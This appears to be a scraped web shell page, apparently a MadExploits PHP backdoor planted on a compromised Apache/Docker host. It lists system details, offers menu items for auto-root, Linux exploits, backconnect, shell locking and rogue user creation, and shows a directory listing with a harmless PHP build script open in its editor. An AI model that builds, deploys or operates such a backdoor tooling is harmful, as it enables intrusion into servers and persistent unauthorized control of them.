Linux 700ba4e1d92d 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Apache/2.4.67 (Debian)
: 172.18.0.2 | : 216.73.217.30
Cant Read [ /etc/named.conf ]
8.2.31
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
apache2-foreground
1.31
KB
-rwxr-xr-x
docker-ensure-installed.sh
3.38
KB
-rwxr-xr-x
docker-entrypoint.sh
3.38
KB
-rwxr-xr-x
docker-php-entrypoint
133
B
-rwxr-xr-x
docker-php-ext-configure
1.42
KB
-rwxr-xr-x
docker-php-ext-enable
2.61
KB
-rwxr-xr-x
docker-php-ext-install
2.9
KB
-rwxr-xr-x
docker-php-source
587
B
-rwxr-xr-x
pear
817
B
-rwxr-xr-x
peardev
838
B
-rwxr-xr-x
pecl
751
B
-rwxr-xr-x
phar
14.89
KB
-rwxr-xr-x
phar.phar
14.89
KB
-rwxr-xr-x
php
18.03
MB
-rwxr-xr-x
php-config
2.93
KB
-rwxr-xr-x
phpize
4.43
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docker-php-ext-configure
#!/bin/sh set -e # prefer user supplied CFLAGS, but default to our PHP_CFLAGS : ${CFLAGS:=$PHP_CFLAGS} : ${CPPFLAGS:=$PHP_CPPFLAGS} : ${LDFLAGS:=$PHP_LDFLAGS} export CFLAGS CPPFLAGS LDFLAGS srcExists= if [ -d /usr/src/php ]; then srcExists=1 fi docker-php-source extract if [ -z "$srcExists" ]; then touch /usr/src/php/.docker-delete-me fi cd /usr/src/php/ext usage() { echo "usage: $0 ext-name [configure flags]" echo " ie: $0 gd --with-jpeg-dir=/usr/local/something" echo echo 'Possible values for ext-name:' find . \ -mindepth 2 \ -maxdepth 2 \ -type f \ -name 'config.m4' \ | xargs -n1 dirname \ | xargs -n1 basename \ | sort \ | xargs echo echo 'Some of the above modules are already compiled into PHP; please check' echo 'the output of "php -i" to see which modules are already loaded.' } ext="$1" if [ -z "$ext" ] || [ ! -d "$ext" ]; then usage >&2 exit 1 fi shift pm='unknown' if [ -e /lib/apk/db/installed ]; then pm='apk' fi if [ "$pm" = 'apk' ]; then if \ [ -n "$PHPIZE_DEPS" ] \ && ! apk info --installed .phpize-deps > /dev/null \ && ! apk info --installed .phpize-deps-configure > /dev/null \ ; then apk add --no-cache --virtual .phpize-deps-configure $PHPIZE_DEPS fi fi if command -v dpkg-architecture > /dev/null; then gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)" set -- --build="$gnuArch" "$@" fi cd "$ext" phpize ./configure --enable-option-checking=fatal "$@"
Close